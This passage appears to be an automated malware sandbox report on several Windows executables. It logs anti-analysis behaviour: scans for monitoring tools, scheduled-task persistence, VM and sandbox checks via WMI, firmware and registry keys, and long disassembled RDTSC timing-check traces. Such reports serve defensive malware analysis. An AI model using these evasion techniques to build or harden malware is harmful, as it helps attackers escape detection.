Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1F075 second address: E1F07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1F07E second address: E1F082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1F082 second address: E1F088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E12464 second address: E12479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEABh 0x00000007 jg 00007F2F08D1BEA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E12479 second address: E1249C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Ah 0x00000007 pushad 0x00000008 jmp 00007F2F08CCF074h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1E068 second address: E1E06E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1E1B2 second address: E1E1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1E337 second address: E1E34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2F08D1BEABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1E8FF second address: E1E903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1E903 second address: E1E925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2F08D1BEB6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1E925 second address: E1E92B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E2038F second address: E20394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E20394 second address: E203B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2F08CCF06Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jc 00007F2F08CCF06Eh 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E203B5 second address: E203C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2F08D1BEA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E203C5 second address: E203F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF070h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2F08CCF075h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E203F7 second address: E20401 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E20401 second address: E20467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08CCF075h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e sbb dx, BEC4h 0x00000013 mov dword ptr [ebp+122D268Dh], ebx 0x00000019 push 00000003h 0x0000001b sub dword ptr [ebp+122D1BDFh], ecx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F2F08CCF068h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d push 00000003h 0x0000003f xor dword ptr [ebp+122D2621h], ebx 0x00000045 push F9D2B71Dh 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E20467 second address: E204E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2F08D1BEB3h 0x0000000e popad 0x0000000f xor dword ptr [esp], 39D2B71Dh 0x00000016 add cx, 23E1h 0x0000001b pushad 0x0000001c jmp 00007F2F08D1BEAFh 0x00000021 adc esi, 3B4DAAF0h 0x00000027 popad 0x00000028 lea ebx, dword ptr [ebp+1246121Bh] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F2F08D1BEA8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 sbb esi, 35E64A17h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 pop edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E20579 second address: E2057F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E2057F second address: E2059B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007F2F08D1BEB4h 0x00000013 pushad 0x00000014 jo 00007F2F08D1BEA6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E2059B second address: E20669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jg 00007F2F08CCF06Eh 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D1BE6h], eax 0x00000014 push D2AA4341h 0x00000019 jmp 00007F2F08CCF06Dh 0x0000001e add dword ptr [esp], 2D55BD3Fh 0x00000025 mov dl, 4Fh 0x00000027 adc cl, FFFFFFA1h 0x0000002a push 00000003h 0x0000002c push esi 0x0000002d mov ecx, dword ptr [ebp+122D291Dh] 0x00000033 pop esi 0x00000034 push 00000000h 0x00000036 movzx ecx, di 0x00000039 push 00000003h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F2F08CCF068h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 mov edx, 1BB69094h 0x0000005a jns 00007F2F08CCF067h 0x00000060 call 00007F2F08CCF069h 0x00000065 push esi 0x00000066 jmp 00007F2F08CCF06Ch 0x0000006b pop esi 0x0000006c push eax 0x0000006d jmp 00007F2F08CCF074h 0x00000072 mov eax, dword ptr [esp+04h] 0x00000076 jnl 00007F2F08CCF06Eh 0x0000007c mov eax, dword ptr [eax] 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F2F08CCF070h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E20669 second address: E20681 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F2F08D1BEA6h 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E20681 second address: E20695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF06Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E32FB0 second address: E32FD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jc 00007F2F08D1BEA6h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F40F second address: E3F415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F415 second address: E3F425 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2F08D1BEAAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F425 second address: E3F435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F6A5 second address: E3F6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jo 00007F2F08D1BEACh 0x0000000c jng 00007F2F08D1BEA6h 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F990 second address: E3F999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F999 second address: E3F9A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9A1 second address: E3F9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9A7 second address: E3F9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9AD second address: E3F9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9B1 second address: E3F9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F2F08D1BEA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9C2 second address: E3F9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9D1 second address: E3F9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9D5 second address: E3F9D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3F9D9 second address: E3FA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08D1BEB5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F2F08D1BEB3h 0x00000013 jmp 00007F2F08D1BEB1h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3FA1C second address: E3FA34 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2F08CCF068h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F2F08CCF066h 0x00000010 jne 00007F2F08CCF066h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3FB9C second address: E3FBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F2F08D1BEB6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jbe 00007F2F08D1BEA6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3FBC6 second address: E3FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3FFD4 second address: E3FFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08D1BEAAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3FFE4 second address: E3FFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF06Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E40137 second address: E4013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4013B second address: E4013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4013F second address: E4014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2F08D1BEAAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E3815A second address: E38185 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2F08CCF079h 0x00000011 je 00007F2F08CCF066h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E38185 second address: E38189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E0D3D4 second address: E0D3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4081C second address: E40820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E40F0F second address: E40F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2F08CCF066h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E40F1B second address: E40F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E40F21 second address: E40F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E40F2A second address: E40F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E17461 second address: E17479 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2F08CCF068h 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F2F08CCF066h 0x00000010 jng 00007F2F08CCF066h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E17479 second address: E1747D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E46440 second address: E46451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08CCF06Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E465F7 second address: E46644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnc 00007F2F08D1BEBFh 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jmp 00007F2F08D1BEB3h 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E45621 second address: E45625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E45625 second address: E4562B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E48DC3 second address: E48DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF071h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E48DDB second address: E48DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2F08D1BEA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4DE4F second address: E4DE6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F08CCF079h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4DE6E second address: E4DE80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jl 00007F2F08D1BEACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E10853 second address: E10857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E10857 second address: E1086D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F2F08D1BEA6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1086D second address: E10877 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E10877 second address: E10881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2F08D1BEA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4D642 second address: E4D647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4DA0F second address: E4DA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E4DA13 second address: E4DA18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E04F70 second address: E04F7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E52FB1 second address: E52FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F2F08CCF066h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
